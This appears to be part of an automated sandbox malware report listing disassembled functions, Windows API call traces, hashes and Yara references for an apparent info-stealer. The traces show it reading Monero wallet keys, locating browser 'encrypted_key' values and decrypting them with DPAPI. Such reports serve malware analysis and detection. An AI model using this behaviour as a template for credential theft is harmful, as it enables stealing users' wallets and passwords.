                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: c1247381cc89ec5be16e1f477c7893d52e94a0484c940dc09c8cabb3320555f5
                                  • Instruction ID: 7f133153090e33ff260760fd74fc884a6c8e14f63bd0c60b26609b8a4c1e5f8d
                                  • Opcode Fuzzy Hash: c1247381cc89ec5be16e1f477c7893d52e94a0484c940dc09c8cabb3320555f5
                                  • Instruction Fuzzy Hash: 4781E172D101049AEB08FBA4DE96EEE7378BF64300F50455AF517B6091EF386A09CB72
                                  Function 00A7F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                    • Part of subcall function 00A799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                    • Part of subcall function 00A799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                    • Part of subcall function 00A799C0: ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                    • Part of subcall function 00A799C0: LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                    • Part of subcall function 00A799C0: CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                    • Part of subcall function 00A88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A88E52
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00A91580,00A90D92), ref: 00A7F54C
                                  • lstrlen.KERNEL32(00000000), ref: 00A7F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: aba5be2f666638bedf0663ea08ad4480223d85d30ea7dd7d696e508af4ee456f
                                  • Instruction ID: 1fe16285adfe2665518b30ac27f8dc6b841ddb23daa4ce23ad8c4bf26ebafca7
                                  • Opcode Fuzzy Hash: aba5be2f666638bedf0663ea08ad4480223d85d30ea7dd7d696e508af4ee456f
                                  • Instruction Fuzzy Hash: D351F472D10108ABEB04FBB4DD96DED7779AF64300F508529F416A7191EF386A09CBB2
                                  Function 00A83560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 5afd1924775a700ca37d0912f73280ed400d8e16d496c5b830d90052d9a06256
                                  • Instruction ID: fa66c02b56c74fb17aa4017c9b64bf8008ff9fd95618725c01a87301cfb27062
                                  • Opcode Fuzzy Hash: 5afd1924775a700ca37d0912f73280ed400d8e16d496c5b830d90052d9a06256
                                  • Instruction Fuzzy Hash: FF414F72D10109AFDF04FFA4D945AFEB7B4BF54704F008429E416A6290EB75AA05CFA1
                                  Function 00A79CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                    • Part of subcall function 00A799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                    • Part of subcall function 00A799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                    • Part of subcall function 00A799C0: ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                    • Part of subcall function 00A799C0: LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                    • Part of subcall function 00A799C0: CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                    • Part of subcall function 00A88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A88E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A79D39
                                    • Part of subcall function 00A79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79AEF
                                    • Part of subcall function 00A79AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A74EEE,00000000,?), ref: 00A79B01
                                    • Part of subcall function 00A79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79B2A
                                    • Part of subcall function 00A79AC0: LocalFree.KERNEL32(?,?,?,?,00A74EEE,00000000,?), ref: 00A79B3F
                                    • Part of subcall function 00A79B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A79B84
                                    • Part of subcall function 00A79B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00A79BA3
                                    • Part of subcall function 00A79B60: LocalFree.KERNEL32(?), ref: 00A79BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 9ec0f8025d9c2202d566c1936a4a5084349d02d3862a417b6d027c51f07a0cc7
                                  • Instruction ID: 36e32b04ad6acf0512d915389b1551bdaba50706f5b7e296ecddd34c42d553e1
                                  • Opcode Fuzzy Hash: 9ec0f8025d9c2202d566c1936a4a5084349d02d3862a417b6d027c51f07a0cc7
                                  • Instruction Fuzzy Hash: CA3123B6D10109ABCF14EBE4DD85AEF77B8BF48304F14C559E905A7241FB349A04CBA1
                                  Function 00A85050 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A8508A
                                  • lstrcat.KERNEL32(?,0068E928), ref: 00A850A8
                                    • Part of subcall function 00A84910: wsprintfA.USER32 ref: 00A8492C
                                    • Part of subcall function 00A84910: FindFirstFileA.KERNEL32(?,?), ref: 00A84943
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                  • String ID: (h$h
                                  • API String ID: 2699682494-1439427960
                                  • Opcode ID: 7bb378e8aedfc6fa9eb8c2985c60d5e7da47cf6a437d824f98e879b2d7c20fec
                                  • Instruction ID: ce862ec0ff06f56288a128d73a6c93a64b7272b97cb6cb51677966919ded5c16
                                  • Opcode Fuzzy Hash: 7bb378e8aedfc6fa9eb8c2985c60d5e7da47cf6a437d824f98e879b2d7c20fec
                                  • Instruction Fuzzy Hash: 41019676900208A7CB54FB74DD42FEE737CAB64300F404694B68957191FE759AC88BE2
                                  Function 00A892E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00A83AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00A83AEE,?), ref: 00A892FC
                                  • GetFileSizeEx.KERNEL32(000000FF,00A83AEE), ref: 00A89319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00A89327
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: 0af03702c6cdeb3fea2acef252d16e6e60c45ab3e69e040fdd1bc176a96a9a47
                                  • Instruction ID: fc82391b506ddf4a1d6b168a2e102792f557205934ecea6d2fd611ee292b2a5d
                                  • Opcode Fuzzy Hash: 0af03702c6cdeb3fea2acef252d16e6e60c45ab3e69e040fdd1bc176a96a9a47
                                  • Instruction Fuzzy Hash: D8F04F75E44308BBDB10EFB0DC49FAE77B9EB48710F10C298B691AB2C0DA7096018B80
                                  Function 00A8C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00A8C74E
                                    • Part of subcall function 00A8BF9F: __amsg_exit.LIBCMT ref: 00A8BFAF
                                  • __getptd.LIBCMT ref: 00A8C765
                                  • __amsg_exit.LIBCMT ref: 00A8C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00A8C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: bffa206c600463ddc5414ee2bfa2a813353caf3aef68829b48b6f2c9ce254e7f
                                  • Instruction ID: ec8cd911a568b135eb9aaf1143af4f980a9e8e1bad98f771e6007ccc42b0b8b0
                                  • Opcode Fuzzy Hash: bffa206c600463ddc5414ee2bfa2a813353caf3aef68829b48b6f2c9ce254e7f
                                  • Instruction Fuzzy Hash: D9F0B432A243109FD720BBB85A07B4D33A0AF00730F20414AF505A61D2DF745D419F7A
                                  Function 00A84F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84F7A
                                  • lstrcat.KERNEL32(?,00A91070), ref: 00A84F97
                                  • lstrcat.KERNEL32(?,00688A28), ref: 00A84FAB
                                  • lstrcat.KERNEL32(?,00A91074), ref: 00A84FBD
                                    • Part of subcall function 00A84910: wsprintfA.USER32 ref: 00A8492C
                                    • Part of subcall function 00A84910: FindFirstFileA.KERNEL32(?,?), ref: 00A84943
                                    • Part of subcall function 00A84910: StrCmpCA.SHLWAPI(?,00A90FDC), ref: 00A84971
                                    • Part of subcall function 00A84910: StrCmpCA.SHLWAPI(?,00A90FE0), ref: 00A84987
                                    • Part of subcall function 00A84910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A84B7D
                                    • Part of subcall function 00A84910: FindClose.KERNEL32(000000FF), ref: 00A84B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: c4b6b95494901d8ee4a716ad85ab6c2839c3caca4f7145a657850e8ba44f0a10
                                  • Instruction ID: cbad6725c9f27393b961f62a730eee4d1247ea9fe8d6d460277ae6e40e633722
                                  • Opcode Fuzzy Hash: c4b6b95494901d8ee4a716ad85ab6c2839c3caca4f7145a657850e8ba44f0a10
                                  • Instruction Fuzzy Hash: 5921AA769002087BCB54FBB0DD46FED337CBB58700F404694B69993581EE759BC88BA2